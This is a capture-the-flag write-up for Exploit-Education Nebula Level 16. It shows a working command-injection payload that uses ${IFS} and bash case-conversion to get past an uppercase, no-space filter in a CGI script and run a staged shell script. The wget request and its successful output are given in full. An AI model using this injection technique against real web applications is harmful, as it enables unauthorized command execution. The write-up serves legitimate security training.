Exploit-Education Nebula Level 16
1 minute read
Challenge
level16@nebula:/home/flag16$ cat thttpd.conf | grep -v "#"
port=1616
dir=/home/flag16
nochroot
user=flag16
cgipat=**.cgi
level16@nebula:~$ netstat -peanut
(No info could be read for "-p": geteuid()=1017 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 127.0.0.1:50001 0.0.0.0:* LISTEN 987 10807 -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 12702 -
tcp 0 0 0.0.0.0:10007 0.0.0.0:* LISTEN 982 10802 -
tcp 0 0 192.168.5.134:22 192.168.5.1:50665 ESTABLISHED 0 12746 -
tcp 0 0 192.168.5.134:22 192.168.5.1:50293 ESTABLISHED 0 12084 -
tcp6 0 0 :::1616 :::* LISTEN 0 10796 -
tcp6 0 0 :::22 :::* LISTEN 0 12704 -
tcp6 0 0 :::7007 :::* LISTEN 0 10747 -
udp 0 0 0.0.0.0:68 0.0.0.0:* 0 12579 -
level16@nebula:~$
No lowercase
No space
{IFS}
"${IFS}1;Y="/TMP/RUN.SH";Y="${Y,,}";$Y${IFS}"
echo "echo pwned>/tmp/out;">/tmp/run.sh
echo "getflag>>/tmp/out;">>/tmp/run.sh
cat /tmp/run.sh
chmod 777 /tmp/run.sh
wget 'http://192.168.5.134:1616/index.cgi?username="${IFS}1%3bY="/TMP/RUN.SH"%3bY="${Y,,}"%3b$Y${IFS}"' -O out
level16@nebula:~$ echo "echo pwned>/tmp/out;">/tmp/run.sh
level16@nebula:~$ echo "getflag>>/tmp/out;">>/tmp/run.sh
level16@nebula:~$ cat /tmp/run.sh
echo pwned>/tmp/out;
getflag>>/tmp/out;
level16@nebula:~$ chmod 777 /tmp/run.sh
level16@nebula:~$ wget 'http://192.168.5.134:1616/index.cgi?username="${IFS}1%3bY="/TMP/RUN.SH"%3bY="${Y,,}"%3b$Y${IFS}"' -O out
--2019-08-23 11:26:51-- http://192.168.5.134:1616/index.cgi?username
=%22$%7BIFS%7D1%3bY=%22/TMP/RUN.SH%22%3bY=%22$%7BY,,%7D%22%3b$Y$%7BIFS%7D%22
Connecting to 192.168.5.134:1616... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `out'
[ <=> ] 123 --.-K/s in 0.006s
2019-08-23 11:26:51 (19.6 KB/s) - `out' saved [123]
level16@nebula:~$
level16@nebula:~$ cat /tmp/out
pwned
You have successfully executed getflag on a target account
